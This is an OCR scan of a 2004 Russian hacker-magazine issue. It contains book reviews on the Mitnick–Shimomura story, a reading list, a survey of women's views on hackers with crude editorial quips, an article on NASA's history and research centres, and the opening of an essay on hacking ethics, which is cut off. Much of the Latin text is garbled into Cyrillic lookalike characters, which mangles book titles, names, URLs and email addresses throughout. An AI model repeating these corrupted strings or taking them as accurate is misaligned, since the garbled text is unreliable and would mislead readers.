Книга вполне заслуживает того, чтобы ее 
прочитали. История Поулсена ничуть не ме- 
нее интересна, чем история Митника, кстати, 
его друга. Но за стиль я ставлю автору трояк. 



ГДЕ ВЗЯТЬ: заказать на ѵм.апшоп.сот 
РЕЙТИНГ: 3/5 

^ТПКЕ00ШІ:ТНЕРІІН8ШТ 
ЯО СПРТІІНЕ ОЕ КЕШИ МІТШСК, 
пнЕПжмозтигпішо 
СОМРІІТЕН ОІІПОНГ- ВѴ ТНЕ МОИ 
Ш0ШІТЛ5ІІТ0М1І 
зшюмивтошмившр, 

1996 





Жил-был Цутому Шимомура, авторитетный 
компьютерный эксперт. Но однажды злой 
хакер Кевин Митник взломал его компьютер 
и украл важные файлы. Чем авторитет нехи- 
ло так подорвал. Цутому поклялся отомстить 
и принялся выслеживать обидчика. Высле- 
дил, зло было наказано, а добро решило на- 
писать об этом книгу и срубить немножечко 
бабла. 

Как ты уже, наверное, догадался, эта кни- 
га и есть Такебоѵѵп - версия Шимомуры о 
том, что на самом деле произошло. Откро- 



венно говоря, Цутому - ни в коем разе не 
писатель, это понятно с первых же страниц. 
Именно поэтому он воспользовался по- 
мощью своего старого друга Джона Маркофа 
- журналиста из Иевд Уогк Тітез, который 
разбавил технические занудства сюжетом. 
Правда, как утверждает сам Кевин Митник, 
вряд ли стоит верить всему, что пишет Мар- 
коф. Журналеру, мол, главное сенсации, а 
истина - дело второе. 

Итого имеем: занудства Цутому Шимому- 
ры, разбавленные саморекламой, и утки 
Джона Маркофа о Кевине Митнике. Отлично, 
ребята. ѴѴеІІ, как говорится, гіопе. 

ГДЕ ВЗЯТЬ: заказать на ѵѵѵѵѵѵ.ашагоп.сот 

РЕЙТИНГ: 2/5 

К сожалению, обо всех книгах рассказать 
не получилось. Но, думаю, этих тебе на пер- 
вое время хватит :). Ну а когда их осилишь, 
можешь поискать литературу из этого списка: 

Арргоасіііпд 2его: ТМе Ехігаогбіпагу 
ЦпсІегѵѵогІсІ оі Наскегз, Ріігеакегз, Ѵігиз 
Ѵі/гііегз, апб КеуЬоагб Сгітіпаіз, РаиІ Мипдо & 
Вгуап СІоидіі 

Оиі о? (Не Іппег Сігсіе: Тііе Тгие Зіогу оі а 
Сотриіег Іпігисіег СараЫе о? Сгаскіпд Іііе 
ІЧаііоп'з Мозі Зесиге Сотриіег Зузіетз, ВІІІ 
Ьапгігеііі 

Тііе Еидіііѵе Сате: Опііпе ѵѵіііі Кеѵіп 
Мііпіск, Цопаікіап Ціітап 

Тііе Сотриіег Цпсіегдгоипсі: Наскіпд, 

Рігасу, Ріігеакіпд апб Сотриіег Сгіте, М. 
Нэпу 

Тііе Наскег'з Оісііопагу: А Сиібе іо іііе 
ѴѴогІб оі Сотриіег ѴѴІгагбз, ЗіееІ, Цг., Сиу 

Апагсііу Опііпе: №і Зех №і Сгіте, Сііагіез 
Ріаіі 

ѴѴііеге ѴѴІгагбз Зіау ІІр Ьаіе: Тііе Огідіпз оі 
іііе Іпіегпеі, Каііе Наіпег & Маііітеѵѵ Ьуоп 

Арріе Сопіібепііаі: Тііе Веаі Зіогу оі Арріе 
Сотриіег, Іпс., Оѵѵеп \Л/. Ьіпітауег 

Оиі оі Сопігоі: Тііе ІЧеѵѵ Віоіоду оі 
Масіііпез, Зосіаі Зузіетз апб іііе Есопотіс 
ѴѴогІб, Кеѵіп Кеііу 

Сгеаі Матбо Сіііскеп апб іііе Тгапзііитап 
Сопбіііоп: Зсіепсе Зіідііііу оѵег іііе Ебде, Есі 
Ведіз 

Аі Ьагде: Тііе Зігапде Сазе оі іііе ѴѴогісГз 
Віддезі Іпіегпеі Іпѵазіоп, Цаѵісі Ргеебтап & 
Сііагіез Мапп 

Все эти книги так или иначе имеют отно- 
шение к компьютерному андеграунду и тоже 
заслуживают внимания. 

ХІРЗ ^ТРІСИіЗ 



Хочешь увидеть свои советы в журнале? 
Присылай их на адрес $кіуагоѵ@геаІ.хакер.ги. 
Ведущий рубрики Тірз&Тгіскз Иван Скляров. 



л Если такие как ИЛЕЙ (12.03, стр.57) защитят свой 
сайт от копирования НШЬкода разными примочками, 
просто в меню "Вид" (в ІЕ) выбери просмотр НТМІ-ко- 
да, и все. И никакие примочки для чайников тут не по- 
могут =). 

1Й38 

ІС0 178869950 
и238@гатЫег.гіі 







КАЙТСЕРФИНГ 

Теплые деньки уже близятся, и готовиться к 
водному экстриму самое время. Трениро- 
ваться можно где-нибудь в теплых странах, 
а можно прямо по льду на серфе рассекать. 

НАШИ В ГЕРМАНИИ 
Чтобы посмотреть мир, совершенно не 
обязательно отваливать кругленькие суммы 
за отели и транспорт. Есть более 
экономичные и гораздо более безбашенные 
способы. Читай о приключениях наших 
чуваков в Дойчлянде. 

ТРАФАРЕТЫ 

Зіепсіі агі - разновидность граффити, 
уличного искусства рисования на стенах. 
Это быстро, лаконично и доступно даже 
тому, кто не обременен талантом 
художника. Хочешь научиться? Не вопрос, 
все покажем и расскажем! 

КОЛЕСА И ЗАКОН 

Техника техникой но помимо чисто 
технических траблов у нормального 
автовладельца полным-полно 
юридических. Мы нашли чела, который в 
этом всем шарит, и старательно записали 
его ответы на наши вопросы. 

А ЕЩЕ: 

Аргоборд тест пива, велохулиганы, веселые 
самоубийства, все постоянные и кое-какие 
новые рубрики. Жди с нетерпением! 



О 













ы наверняка хакер. Ипи почти хакер. Ипи потенциальный хакер со стажем. И едва познакомившись с миной цыпочкой, с 
воодушевлением начинаешь ей рассказывать о своих хакерских похождениях. Но постой, братеппо! Ты уверен, что она это оценит? 
Уверен, что слово "хакер" действует на эту девочку таким же магическим образом, как на тебя? Тут не все так просто. 

Чтобы прояснить ситуацию, мы провели в Сети социологический опрос. Женской половине интернета в возрасте от 1 4 до 74 я задал три 
вопроса: "Кто такие хакеры?", "Есть пи у тебя знакомый хакер?" и "Смогла бы ты встречаться/выйти замуж за хакера?" Вот что из этого 
получилось. 



какими нас виаят девочки и девушки, тетеньки и бобушки 



к. 




А ІММІСВЯІШЯ 

(18 лет, Канада, сердцеедка со 
стажем): 

О. Хакеры - это та- 
кие маленькие прыща- 
вые уродцы, которым 
никто не дает, поэтому 
они посвятили всю свою жизнь компу. Не 
люблю я хакеров, что-то в них есть западли- 
стское. 

О. Нет, к счастью у меня нет таких знако- 
мых. Кроме, разве что, папы, которому тоже 
когда-то было 17, и он был прыщавым... 

О. На фиг надо? Встречаться надо со сто- 
матологами! 

(Встречаться надо с миллионерами, глу- 
пенькая! - прим. тіпсМІгк.) 

А ТЕТЯ ДЖИНР 

(22 года, г. Санкт-Петербург, 
королева рунета, мента поэ- 
та): 

О. Хакеры - люди, 
либо очень образован- 
ные, либо наделенные 
талантом управлять 

цифрами. Мне ни знаний таких, ни талантов 
не дано, иначе не заморачивалась бы и ор- 
ганизовала кеѵѵі дігіг баск Теат =). Всех ха- 
керов люблю, за исключением спамеров. 

Это как-то противоречит идеологии, имхо. 
Тупая нажива за счет примитивных способов 
не вызывает никакого уважения. Вирьмейке- 
ры иногда создают шедевры. А уж про кряки 
к играм и софту я вообще молчу. Как без 
них? 

О. Знакомые хакеры есть, но называть их 
не буду - тайна =). 

О. По последнему пункту - несомненно. 

(Оказывается, спамеры у нас - в категории 
хакеров. Браво, тетя - прим. тіпбѵѵОгк.) 

А ИПСЬКП 

(23 года, г. Москва, выдаю- 
щийся юрист): 

О. Люди, которые 
настолько поднаторе- 
ли в компьютерном 
искусстве, что им ста- 
ло скучно использо- 
вать его в рамках закона. По сути, талантли- 
вые хулиганы, асоциальные личности. 




О. По-настоящему крутого, взломавшего, 
скажем, систему Центробанка или ФСБ - 
нет. 

О. Могла бы, если бы у него было все в 
порядке с мозгами. Правда, это относится 
не только к хакерам :)). 

(Вот так у нас, стало быть, определяется 
крутость хакеров - прим. тіпсМІгк.) 

А ВОРОНОВО 

(16 лет, г. Москва, вечно моло- 
дая и красивая): 

О. Хакеры - это ум- 
ные люди, ненавидя- 
щие других людей. 
Собственно, ум - это 
единственное, что от- 
личает их от подростков, пишущих на стенах 
лифтов. А в остальном, что может быть 
привлекательного в человеке, у которого ма- 
ничка - портить жизнь другим? Хотя нет, ког- 
да наши хакеры взломали что-то американс- 
кое - каюсь, мне было приятно :-). 

О. Знакомых таких не имею, и иметь не 
хочу. 

О. Встречаться и выходить замуж - нет, 
предпочитаю социально приемлемых муж- 
чин. 

(Отличает то, что подростки-лифтописцы 
бородатые через одного, а хакеры - все по- 
головно, да в пудовых очках - прим. 
тіпсМІгк.) 

И А шѵ_ш_шѵ 

(14 лет, г. Москва, само совер- 
шенство): 

О. В массе своей 
существа, не представ- 
ляющие для девушек 
особого интереса. Хотя 
попадаются фантасти- 
ческие юноши. Например, укр-хыр, эйсид 
(по-моему, ОІп называлась его команда), со- 
вершенно неземной красоты мальчик Дарк 
(тоже из хыровской компании), вполне ми- 
лый парень Джонни (оттуда же). Правда, по- 
моему, они пару лет назад перестали быть 
хакерами :)). 

О. Есть! Что вы имеете в виду? :) 

О. Встречаться - да. Выйти замуж - нет. 
(Какое глубокое знание сцены. Девушка, 
вы сама, случаем, не хакер? :) - прим. 
тіпсМІгк.) 




А СЕЛЕНО 

(37 лет, г. Новосибирск, инже- 
нер-электронщик, в Сети с 
1999 года): 

О. Хакеры - это лю- 
ди, которые знают о 
жизни компьютерных 
программ даже то, чего 
не знает никто. Они могут разобраться в лю- 
бом коде любой программы и добиться от 
нее того, чего не мог предусмотреть даже ее 
разработчик. 

О. Мой знакомый хакер со стажем внеш- 
не ничем не отличается от обычного челове- 
ка, но уровень его знаний просто энциклопе- 
дический. 

О. Выйти замуж за крутого хакера? О, это 
была бы отличная партия! А что, есть подхо- 
дящая кандидатура? 

(Могу выставить свою кандидатуру. Прав- 
да, я не хакер, но, может, тоже чем сгожусь? 
- прим. тіпсІѵѵОгк.) 



А мпизнкп 

(15 лет, г. Киев, умница-краса- 
вица, туристка): 

О. Нууу. Это такие 
злые дядьки, которые 
где-то сидят и проника- 
ют через сети везде. 

Вот мы сейчас туг типа 
беседуем, а может, какой-то хакер за нами 
наблюдает :)). Вообще, их мало кто видел и 
знает, только ФБР какое-нибудь. Но хакеры 
тоже про него много знают, так как взламыва- 
ют его постоянно :)). 

О. Нет :)). Хотя со мной в школе пацык 
учится, он - почти что хакер. Тоже в компах 
шарит - жуть. И неряшливый. Точно хакер :)). 

О. Нет :)). Ни то ни другое. Тем более у ме- 
ня есть парень :)). И он уж точно не хакер :))). 

(Ты уверена, смешинка? Посмотри, у него 
борода есть? А очки? А ладони у него не во- 
лосатые? - прим. тіпбѵѵОгк.) 





А СВЕТЯ 

(27 лет, г. Таганрог, менеджер 
вкрулной компании): 

О. Понятия не имею, 
кто такие хакеры. Мне 
до них нет никакого де- 
ла. Хотя, насколько 
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можно судить из газет, это компьютерные 
отморозки, которым больше нечем заняться, 
кроме как измываться над другими людьми 
через компьютер. Я бы их всех сажала. Раз 
не могут себя нормально вести, пусть поси- 
дят в изоляции. Подумают что и как. 

О. Я не завожу знакомств с компьютерны- 
ми отморозками. 

Ѳ. Ага. Завтра его посадят, и мне что, в 
тюрьму сухарики носить? Спасибо. Я уж луч- 
ше как-нибудь сама. Хотя, почему сама? 
Слава Богу, поклонников хватает. 

(Можно принести ему пилочку для ногтей, 
заныканную в батоне. Тогда он перепилит 
решетки и сбежит. Правда, не к тебе - к сво- 
ему любимому компу - прим. тіпсІѵѵОгк.) 

А кнорптнп 

(19 лет, г. Москва, будущая 
звезда экрана): 

О. Я смотрела 
фильм "Хакеры". Зи- 
роу Кул - просто ми- 
лашка. Если все хаке- 
ры такие - я их обо- 
жаю. Честно говоря, я бы хотела быть хакер- 
шей. Такой как Эсид Берн. Например, если 
задрал начальник - обнулить ему счет на 
кредитке. Вот бы он удивился -)). Но видно, 
не судьба. Я еще со школы не переваривала 
информатику. Ну ничего, может, хоть актри- 
сой стану. И сыграю хакершу в каком-нибудь 
фильме -). 

О. К сожалению, нет. Но с удовольствием 
бы познакомилась. Если среди читателей ва- 
шего журнала есть хорошие хакеры, и они не 
прочь поболтать с привлекательной брюнет- 
кой - пусть пишут на адрес: 
даз_056@ таі I . ги . Я обязательно отвечу -). 

О. Ну, так сразу сложно ответить. Смотря 
какой он человек будет. Ведь главное - это 
не чем он занимается, а что он собой предс- 
тавляет. Если как мужчина он меня будет 
устраивать, то почему нет? Это было бы да- 
же интересно -). 

(В очередь! В очередь, сукины дети! :)) - 
прим. тіпсІѵѵОгк.) 

АПШ 

(28 лет, г. Москва, литератур- 
ный редактор ][): 

О. Хакер, на мой 
взгляд - это человек, 
который может взло- 
мать компьютерную 
систему. И неважно, 
занимается он этим на самом деле, или его 
знания чисто теоретические. Причем под 
"взломать" я не имею в виду просто заюзать 
скачанный из Сети готовый эксплойт - этим 
занимаются скрипткидди. Думаю, хакеры - 
обычные ребята, может, чуть больше сдви- 
нутые на компах, чем все остальные. 

в. Трудно сказать, есть ли у меня знако- 
мые хакеры. Скажем, есть люди, у которых 
достаточно знаний для того, чтобы зани- 
маться хаком, но применяют эти знания они 
в несколько иной области :). 

Ѳ. Замуж за хакера? Почему бы и нет? Но 
только если я буду уверена, что однажды за 
ним не придут с ордером на арест. 

(А ведь раньше жены декабристов на Ка- 
лыму за мужьями отправлялись. Да-а, как 
все изменилось - прим. тіпсІѵѵОгк.) 





А ППЕНКП 

(17 лет, г. Уфа, художница): 

О. Это компьютер- 
ные которые? Ну, слы- 
шала немного про них. 
У нас тут писали в га- 
зете про одного здеш- 
него хакера. Он там интернет у кого-то ук- 
рал. Не понимаю, зачем что-то красть, когда 
оно стоит - копейки. Хотя, если бы я знала 
как, может, и сама б стянула. Не знаю :). В 
моем понимании хакеры - те же пацаны, 
только замкнутые, больше предпочитают у 
компа посидеть, чем еще где. Не думаю, что 
они такие уж прям умные, как говорят. Был 
бы тот, которого поймали, умнее - не попал- 
ся бы. 

О. Я как-то чаталась с одним хакером! При- 
кольный чувак, хотел меня на виртуальный 
секс развести :)). Ну ясно, в жизни не хватает, 
так хоть тут :)). У него еще ник прикольный - 
24гиЬ@. Я его еще подкалывала на этот счет. 

Ѳ. Выйти замуж вряд ли. Ну выйду, и что 
дальше? Сидит целыми днями у компа, на 
меня - ноль эмоций. Так тарелок не напа- 
сешься, чтобы бить ему об стол и обращать 
на себя внимание. Был бы он богатый, кра- 
сивый хакер и заботливый хакер - цены бы 
ему не было. Но где ж такого взять? :)) 

(Ага. А хакеру нужна девочка длинноногая 
и фигуристая, а еще со знанием азма, си++, 
Іср/ір и прочего ВЕС. Хотите брать - умейте 
давать! - прим. тіпсІѵѵОгк.) 




А СЬЮЗЕН 

(24 года, США, журналистка): 

О. Я писала про од- 
ного хакера. Мы с ним 
встречались в пабе, 
мило так пообщались. 
Очень даже приятный 
молодой человек. Ра- 
ботает в компьютерной компании, следит 
там за безопасностью сети. В свободное 
время разрабатывает какое-то серьезное 
ПО. Ничего общего с теми хакерами, о кото- 
рых так любит писать Маркоф в N7 Тітез, не 
имеет. Правда, если дать волю, мог часами 
рассказывать про свое увлечение. Но у меня 
просто статья об этом была, так что я была 
вовсе не против. 

в. Кроме Алана, про которого я уже рас- 
сказала, есть еще один парнишка. Работает 
в фирме моего бойфренда, отвечает там за 
все компьютерное. Глаз на меня положил. 
Пытается делать вид, что не замечает, но я- 
то все вижу :). Кстати, ваш, из России. Нем- 
ного чудной, но с компьютерами творит 
просто чудеса. Хоть и самоучка. 

©. За такого, как Алан, выйти замуж впол- 
не могла бы. Я уже задавала себе такой воп- 
рос. За Александра - вряд ли. Просто не мой 
тип мужчины. Хотя ничего плохого про него 
сказать не могу. 

(Сашок! Засади ей, Сашок! Хе-хе - прим. 
тіпсІѵѵОгк.) 





А РІІ88Ѵ 

(17 лет, г. Херсон, фа- 
натка ГО и вообще 
панк-рока): 

О. Хакеры - это та- 
кие смешные зверьки, 
которые не вылазят 



из-за компа, а если и вылазят, то только и 
думают о том, чтобы вернуться обратно. Че- 
го-то там программируют, общаются с себе 
подобными. Не знаю, насколько их вообще 
интересует реальный мир. Наверное, не осо- 
бо. Да и зачем он им, ведь у них есть компь- 
ютер ;)). 

О. Нет, знакомых хакеров нет. Мы живем 
в разных параллелях. 

О. Ну, как я могу однозначно сказать? Ес- 
ли понравится - да, пусть даже подружки 
прикалываются. Если он какой-то заморыш и 
месяцами не моется - на фиг надо. Еще 
подхватишь от него какую-то болячку ;). Же- 
ниться в любом случае нет. Я вообще пока 
что не тороплюсь жениться. 

(Да-да, хакеры - они все такие. Годами не 
моются, постоянно чешутся, и еще у них 
вермишель в бороде - прим. тіпсІѵѵОгк.) 



А ВЕРП ПНПТОПЬЕВНП 

(74 года, ПГТ Таврийск, пенси- 
онерка, ветеран труда): 

Чавой? Какие еще 
хакеры? Компьютер- 
ные? Я, милок, сроду 
за компьютером не 
сидела. И так зрение 
- никуда не годится, 
совсем слепая стала. 
Мне только еще компьютера не хватало. 
И хакерам своим передай, чтоб помень- 
ше сидели за компьютером. У меня вну- 
чок вон - целыми днями просиживает. И 
что? Уже пора покупать очки. А ведь ему 
только 16! Совсем ослепнет с этим 
компьютером. 

(Бабушка, а откуда нам знать, что вы ос- 
лепли не в результате еженощных сидений 
за компом? А ну колитесь, бабушка, сколько 
систем вы хакнули за последний месяц? - 
прим. тіпсІѵѵОгк.) 





А ДОШП 

(20 лет, г. Харьков, студентка 
филфака): 

О. Мне кажется, 
большинство людей 
имеют слабое предс- 
тавление о том, кто 
такие хакеры на са- 
мом деле. Истории, описанные в бульвар- 
ных газетках - не показатель. Я читаю ваш 
журнал, читала книгу С.Леви "Хакеры", да 
и фильм смотрела, поэтому в целом 
представление имею. Считаю, что хакер- 
ство - занятие далеко не для каждого. 
Нужно обладать незаурядным интеллек- 
том, терпением и гибкостью мышления, 
чтобы успешно обходить защиты, подби- 
рать ключик к цифровым замкам. А безг- 
раничная увлеченность своим делом мне в 
них только нравится. 

О. Знакомые продвинутые компьютерщи- 
ки есть, правда, не знаю, можно ли их наз- 
вать хакерами. Мне они, конечно, ничего та- 
кого не рассказывают, но уровень знаний у 
них высокий. 

О. Несомненно. Я уверена, среди хакеров 
есть много интересных, симпатичных ребят. 
И было бы отлично, если бы мне удалось 
разнообразить его компьютерную жизнь сво- 
им участием. 

(Чмок. Ты моя радость - прим. тіпсІѵѵОгк.) 
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ХПКЕР/№03(63)/2004 



0 спи ты думаешь, что самый хай-тек - это твой супермодный трЗ-ппеер ипи зеркальный цифровой фотик, то ты, дружище, глубоко 
заблуждаешься. Все это - игрушки для детей. Настоящий хай-тек скрывается в космической области: в шаттлах, напичканных 
электроникой, в электронных телескопах, способных разглядеть каждую трещинку на поверхности соседних планет. 

Космическая область - довольно молодая, и нельзя сказать, что слишком уж быстро развивающаяся. Тем не менее, в нее впиваются 
большие средства, и многие возлагают на космические исследования большие надежды. Причина тому - постоянно ухудшающаяся 
экология Земли и грозящая проблема перенаселения. 

Из всех аэрокосмических лабораторий, которых в мире немало, наибольший вклад в общее депо, несомненно, вносит американская 
организация N080 (Иаііопаі Оегопаиіісз апб Зрасе Яблііпізііаііоп). Именно о ней я тебе и расскажу. 



рассказ об одной из самых влиятельных организаций миро 



^ИСТОРИЯ N080 

анальной точкой отсчета в ис- 
тории МАЗА было 1 октября 
1958 года. Именно в этот день 
американское правительство, 
подавленное успехами СССР в 
космической области (к этому 
времени мы уже запустили 
первый спутник), сформирова- 
ло новое агентство, главной задачей которо- 
го было исследовать проблемы перелетов 
внутри и вне атмосферы Земли. На тот мо- 
мент организация включала 8 тысяч сотруд- 
ников и имела скромный бюджет 100 милли- 
онов долларов. От своего предшественника 
- ИАСА (Ыаііопаі Асіѵізогу Соттійее Гог 
Аегопаиіісз) - агентство унаследовало три 
крупных исследовательских лаборатории: 
бапдіеу, Атез и беѵѵіз, а также пару неболь- 
ших полигонов для тестирования. Практичес- 
ки сразу после появления на свет ИАЗА прис- 
тупила к работе над крупными проектами. 

В декабре 1 958 г. основным событием 
стал запуск первого искусственного спутника, 
установленного на орбите Земли и способно- 
го получать/принимать звуковые сигналы. 

В 1959 г. МАЗА отправила зонд «Ріопеег 
4» на Луну. 



5 мая 1961 г. произошел первый полет 
американского астронавта Алана Шепарда в 
космос на одноместной капсуле «Ргеебот 7». 
Полет продолжался 15 минут и закончился 
приземлением в океан. В этом же году при- 
оритетным проектом МАЗА стал «Аполло», 
конечной целью которого была высадка аст- 
ронавтов на Луну. 

10 июля 1962 г. МАЗА произвела запуск 
первого коммерческого спутника «Теізіаг 1 », 
используемого телефонными и телевизион- 
ными компаниями. 

2 июня 1966 г. «Зигѵеуог 1» достиг пове- 
рхности Луны и отослал на Землю 1 0 тысяч 
качественных снимков лунных пейзажей. 

В декабре 1 968 г. из Косми- 
ческого Центра Кеннеди в шес- 
тидневный круиз к орбите Луны 
отправились трое американских 
астронавтов с целью протести- 
ровать техническое оборудова- 
ние для будущей высадки. 

И, наконец, 20 июля 1969 г. 
двое американских астронавтов, 

Нейл Армстронг и Эдвин Элдрин 
- пилоты космического аппарата 
МАЗА «АроІІо 1 1 », впервые сошли 
на поверхность Луны. Делая свой 
первый шаг, Армстронг сказал 



фразу, ставшую впоследствии легендарной: 
«Один маленький шаг для человека - огром- 
ный шаг для всего человечества». 

Америке потребовалось 1 1 лет и 25,4 мил- 
лиарда долларов, чтобы высадкой на Луну 
доказать свое лидерство в освоении космоса. 

В первой половине 70-х МАЗА осуществи- 
ла еще несколько удачных полетов на Луну, 
а также провела совместный с СССР проект 
по стыковке двух космических кораблей: 
«Аполло» (США) и «Союз» (СССР). 

1976 стал годом возведения на орбите пер- 
вой американской космической станции ЗкуІаЬ. 

В 1981 г. агентство представило миру 
свою новейшую разработку - космический 
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Прототип космического самолета 



шаттл, который 
мог взлетать 
вертикально и 
приземляться 
подобно само- 
лету. МАЗА воз- 
лагала большие 
надежды на су- 
персовремен- 
ный шаттл «Чел- 
ленджер», пост- 
роенный к 1985 
году, но 28 ян- 
варя 1986 г., 

спустя 73 секунды после взлета его двигатели взорвались, и все 
семеро членов экипажа погибли. Несмотря на катастрофу, агент- 
ство продолжило разработку и усовершенствование космических 
шаттлов, и следующие аппараты: АІІапііз, Різсоѵегу и Епбеаѵоиг 
оказались удачнее своего предшественника. 

Помимо основных проектов, которые широко освещаются в 
прессе (высадка на Луну, постройка космической станции), ІЧА5А 
проводит огромное количество менее заметных, но не менее 
важных. Космические зонды «Ріопеег» и «Ѵоуадег» неоднократно 
использовались для исследования планет Солнечной системы. 

В 90-е годы большим достижением ІЧА5А было размещение 
мощнейшего телескопа Хаббл на орбите Земли, в результате че- 
го человечество получило возможность заглянуть в самые отда- 
ленные части космоса. 

Но основным проектом МАЗА в эти годы стало строительство 
Международной Космической Станции, которое продолжается до 
сих пор и ведется при поддержке 10 европейских стран. 

Л ИССПЕДОВПТЕПЬСКИЕ ЦЕНТРЫ N080 

Организация ІЧА5А - это крупная сеть исследовательских лабо- 
раторий и аэрокосмических центров. Каждое отделение занима- 
ется своими задачами, а для обмена информацией они объеди- 
нены между собой посредством нескольких внутренних сетей: 
ІЧШ, ЫІЗИ, АІ15ТАВ, ИВЕИ, ОЗИ и др. 

Штаб-квартира ІЧА5А расположена в Вашингтоне и вмещает 
около тысячи сотрудников. Основная задача - координировать ра- 
боту МАЗА в целом и контролировать развитие четырех стратеги- 
ческих направлений: исследование космоса, исследование Земли, 
работу с людьми и развитие новых технологий для реализации 
дальнейших проектов. Калифорнийский исследовательский Центр 
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ь. 



л ѵѵѵѵѵѵ.паза.доѵ - официальный сайт ЫА5А 
а ѵѵѵѵѵѵ.Нд.паза.доѵ - сайт штаб-квартиры ЫА5А с большим 
количеством информации 

а ѵѵѵѵѵѵ.паваѵѵаісИ.сош - новостная лента событий, 
касающихся аэрокосмического агентства 
а 1тМр://Ызіогу.па5а.доѵ - сайт, полностью посвященный 
истории развития ЫА5А 

а \ллллл/.5\л/іт2000.огд/Ноте\люгк%20НеІр/па5а_Ы5І:огу.Н*т 

- подробная история ЫА5А 

а ѵѵѵѵѵѵ.паза.доѵ/іпиііітесііа - фотографии и видео ЫА5А 
а ѵѵѵѵѵѵ.ИаЬи.огд/паза/паза-тіггог.ИІтІ - фотогалерея 
а И«р://зрасе^ІідИі.паза.доѵ - информационный ресурс по 
исследованию космоса 

Г 



АМЕ5 - один из старейших в МАЗА, он был 
построен в 1939 г. и назван в честь первого 
директора доктора Джозефа С. Эймса. Центр 
АМЕБ занимается разработкой и созданием 
самых передовых технологий, включая инфор- 
мационные и научные, а также проведением 
всевозможных исследований. 

Исследовательский Центр 6РМО располо- 
жен на территории военно-воздушной базы в 
Калифорнийской пустыне Моджев, и с 1 946 го- 
да стал постоянным местом для тестирования 
прототипов летательных аппаратов. 

Исследовательский Центр ШЕМ (Огайо, 2 
тыс. персонала) является мировым лидером в 
исследовании реактивных двигателей. Помимо 
этого, Центр разрабатывает силовые установки 
и коммуникационные технологии для нужд 
МАЗА. Этот отдел также заведует уникальной 
коллекцией хай-течных сооружений, таких как 
ветровые туннели и вакуумные камеры. 

Космический Центр ООРОАРЮ, вмещаю- 
щий 3 тысячи сотрудников и расположенный 
в Гринбелте, имеет широкий спектр задач: от 
исследования астрофизики и свойств Земли 
до спутникового слежения и контроля. 

Лаборатория реактивных двигателей ЦРІ 
(Пасадена, более 5 тыс. человек) находится 
в собственности американского правитель- 




Сосредоточения исследовательских центров МАЗА 



ства и координируется Калифорнийским Тех- 
нологическим Институтом. ЭРЕ является ис- 
торическим центром планетарных исследо- 
ваний и основным узлом всемирной научной 
сети Реер Брасе Меіѵѵогк. На территории Ла- 
боратории находится множество крупных 
спутниковых тарелок, установленных для 
зондирования космического пространства. 

Космический Центр ЛЭНЫЗОМ, располо- 
женный в Хьюстоне, заведует основными 
космическими проектами МАЗА. Такими, как 
запуск шаттла на орбиту или создание Меж- 
дународной Космической Станции. 

Космический Центр КЕЛЕРУ, как и преды- 
дущий, предназначен для контроля полета кос- 
мических объектов ЫАЗА, но вместе с тем явля- 
ется главной посадочной полосой для шаттлов. 

Исследовательский Центр ІАИОЕЕУ (2300 
персонала), построенный в 1917 г., стал 
первой национальной аэрокосмической ла- 
бораторией. Именно здесь на протяжении 
почти столетия разрабатывались главные 
достижения І\ІА5А. Центр ІАИСНЕУ проводит 
исследования в самых разных научных об- 
ластях, и, судя по всему, именно в нем рабо- 
тают лучшие умы МАЗА. 

Космический Центр МАЯЗНАШ, располо- 
женный в Хантсвилле, занимается конструи- 
рованием космических объектов и хай-теч- 
ных систем для контроля и слежения. 

Космический Центр ЗТЕІМІМІЗ является 
крупнейшим в США комплексом для тестиро- 
вания ракетных двигателей. 

Общее количество сотрудников І\ІА5А дос- 
тигает 18 тысяч. 

Л ОСНОВНЫЕ 30Д0ЧИ 

На проведение разного рода исследований и 
проектов правительство США ежегодно вы- 
деляет І4А5А около 15 миллиардов долларов. 



Эти средства распределяются по разным 
направлениям, в которых работает агентство: 

- Космическая наука (изучение Солнечной 
системы, Марса и Луны, изучение истории 
Вселенной, ее структуры и эволюции, изуче- 
ние взаимодействия Солнца и Земли, поиск 
естественных спутников отдаленных планет и 
внеземной жизни). 

- Земная наука (различные исследования 
нашей планеты, включая воздействия на ок- 
ружающую среду и их последствия). 

- Исследования в области биологии и фи- 
зики (молекулярная биология, нанотехноло- 
гии, ядерная физика и др.). 

- Астронавтика (разработка более быстрых, 
безопасных, экономичных и надежных машин 
для воздушных и космических перелетов). 

- Образовательные программы (подготов- 
ка астронавтов и техперсонала, обучение но- 
вых специалистов, привлечение в научную 
область школьников и студентов). 

- Исследовательские системы (человеко- и 
робото-технологии, системы транспортировки). 

- Космические перелеты (Международная 
Космическая Станция, шаттлы, поддержка 
полетов в космос). 

Как видишь, МАЗА занимается не только 
космическими исследованиями, хоть это нап- 
равление и является основным. Находки и 
изобретения ученых аэрокосмического агент- 
ства используются в производстве пассажи- 
рских и военных самолетов, метеорологии, 
медицине, коммуникациях и других областях. 
Организация владеет дорогостоящим высоко- 
технологическим оборудованием, с помощью 
которого можно проводить подробные иссле- 
дования. И в отличие от военных структур, 
(\ІА5А не скрывает полученные результаты, а 
наоборот, приглашает к сотрудничеству кол- 
лег из других исследовательских центров. 

Уже сейчас в лабораториях МАЗА ведут- 
ся разработки сверхбыстрых систем пере- 
дачи информации, основанных на лазер- 
ном луче. С их помощью станет возмож- 
ным за считанные минуты передавать ог- 
ромные массивы данных в пределах Сол- 
нечной системы. Разрабатываются новые 
виды двигателей и способов транспорти- 
ровки грузов. Проекты МАЗА вдохновляют 
тысячи независимых ученых принимать 
участие в космическом прогрессе. Судя по 
всему, через пару десятков лет нас ждет 
первая высадка на Марс, создание неболь- 
шой колонии на Луне, запуск в активную 
эксплуатацию Международной Космичес- 
кой Станции. А там и до выхода за преде- 
лы Солнечной системы недалеко. ЗС 




ПМЕРИКПНЦЫ НУ ПУНЕ 

М ногие сомневаются в том, что американцы действительно 
высадились на Луну. Существует версия, что США в конце 
60-х были просто не готовы к такому шагу, поэтому, чтобы уте- 
реть нос СССР, организовали грандиозную аферу. 

Интересный тред на эту тему можно почитать на Мембране: 
Подробная версия в пользу ЫА5А лежит здесь: 
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П орошо или плохо занииаться хакои? Кого волнует этическая сторона компьютерного хулиганства? Тебя? Я думаю, да. 
Меня она тоже волнует, хотя я не занимаюсь компьютерным хулиганством, а только графоманией =). Женщина, в пер- 
вую очередь, эмоциональное существо, а только потом логическое, в отличие от мужчины. Не буду тебя разочаровы- 
и постараюсь изложить мысли на эту тему с эмоциональной стороны. 



НТО ТПКОЕ ХОРОШО И ЧТО ТОКОЕ плохо 





Ч то такое хак в моем понимании? Это взлом некой компью- 
терной системы ради одной из двух целей: из-за денег и 
для указания дыр админам. Для меня деньги - хреновая мо- 
